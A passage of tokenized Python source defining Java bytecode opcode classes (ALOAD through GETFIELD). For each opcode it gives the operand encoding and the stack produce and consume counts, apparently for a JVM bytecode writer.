<EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ALOAD_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ALOAD_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ALOAD_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ALOAD_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ALOAD_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ALOAD_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ALOAD_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ALOAD_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ANEWARRAY ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name ) : <EOL> super ( ANEWARRAY , self ) . __init__ ( ) <EOL> self . klass = Classref ( class_name ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . klass . name <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> klass = reader . read_u2 ( ) <EOL> return cls ( reader . constant_pool [ klass ] . name . bytes . decode ( '<STR_LIT>' ) ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . klass ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . klass . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ARETURN ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ARETURN , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ARRAYLENGTH ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ARRAYLENGTH , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( ASTORE , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ASTORE_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ASTORE_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ASTORE_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ASTORE_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ASTORE_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ASTORE_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ASTORE_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ASTORE_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ATHROW ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ATHROW , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class BALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( BALOAD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class BASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( BASTORE , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class BIPUSH ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , const ) : <EOL> super ( BIPUSH , self ) . __init__ ( ) <EOL> self . const = const <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT:U+0020>' + repr ( self . const ) <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> const = reader . read_u1 ( ) <EOL> return cls ( const ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s1 ( self . const ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class BREAKPOINT ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( BREAKPOINT , self ) . __init__ ( ) <EOL> class CALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( CALOAD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class CASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( CASTORE , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class CHECKCAST ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name ) : <EOL> super ( CHECKCAST , self ) . __init__ ( ) <EOL> self . klass = Classref ( class_name ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . klass ) <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> class_name = reader . constant_pool [ reader . read_u2 ( ) ] . name . bytes . decode ( '<STR_LIT>' ) <EOL> return cls ( class_name ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . klass ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . klass . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class D2F ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( D2F , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class D2I ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( D2I , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class D2L ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( D2L , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DADD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DADD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DALOAD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DASTORE , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class DCMPG ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DCMPG , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DCMPL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DCMPL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DCONST_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DCONST_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DCONST_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DCONST_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DDIV ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DDIV , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DLOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( DLOAD , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DLOAD_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( DLOAD_0 , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DLOAD_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DLOAD_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DLOAD_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DLOAD_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DLOAD_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DLOAD_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DMUL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DMUL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DNEG ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DNEG , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DREM ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DREM , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DRETURN ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DRETURN , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DSTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( DSTORE , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DSTORE_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DSTORE_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DSTORE_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DSTORE_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DSTORE_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DSTORE_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DSTORE_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DSTORE_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DSUB ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DSUB , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DUP ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DUP , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DUP_X1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DUP_X1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DUP_X2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DUP_X2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:4> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class DUP2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DUP2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:4> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DUP2_X1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DUP2_X1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:4> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class DUP2_X2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DUP2_X2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:6> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:4> <EOL> class F2D ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( F2D , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class F2I ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( F2I , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class F2L ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( F2L , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FADD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FADD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class FALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FALOAD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class FASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FASTORE , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class FCMPG ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FCMPG , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class FCMPL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FCMPL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class FCONST_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FCONST_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FCONST_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FCONST_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FCONST_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FCONST_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FDIV ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FDIV , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class FLOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( FLOAD , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FLOAD_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FLOAD_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FLOAD_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FLOAD_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FLOAD_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FLOAD_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FLOAD_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FLOAD_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class FMUL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FMUL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class FNEG ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FNEG , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FREM ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FREM , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class FRETURN ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FRETURN , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FSTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( FSTORE , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FSTORE_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FSTORE_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FSTORE_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FSTORE_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FSTORE_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FSTORE_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FSTORE_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FSTORE_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class FSUB ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( FSUB , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class GETFIELD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , field_name , descriptor ) : <EOL> super ( GETFIELD , self ) . __init__ ( ) <EOL> self . field = Fieldref ( class_name , field_name , 